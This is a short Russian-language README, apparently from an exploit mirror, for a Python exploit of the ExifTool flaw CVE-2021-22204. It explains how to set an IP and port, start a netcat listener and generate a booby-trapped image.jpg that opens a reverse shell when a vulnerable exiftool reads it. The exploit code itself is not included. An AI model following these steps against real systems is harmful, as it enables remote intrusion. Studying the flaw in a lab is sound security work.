## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-CONVISOLABS-CVE-2021-22204-EXIFTOOL
# CVE-2021-22204-exiftool
Эксплоит на Python для уязвимости CVE-2021-22204 в Exiftool.
## Об уязвимости
CVE-2021-22204 была обнаружена и сообщена Уильямом Боулингом. (@wcbowling)
Этот эксплоит был создан путем изучения патча Exiftool после того, как CVE уже была сообщена.
## Предварительные требования
Установленные инструменты exiftool и djvulibre. Если вы используете Debian или ubuntu, вы можете установить с помощью:
root@kitploit:~
sudo apt install djvulibre-bin exiftool
## Как запустить:
Измените IP и Port в файле exploit.py. Вы можете протестировать обратную оболочку с помощью
root@kitploit:~
nc -nvlp 9090 # or the port you specify in the exploit.py file
Затем:
root@kitploit:~
python3 exploit.py
И файл image.jpg запустит уязвимость при открытии с помощью уязвимой версии exiftool.
Если вы хотите попрактиковаться, есть небольшая лабораторная работа здесь.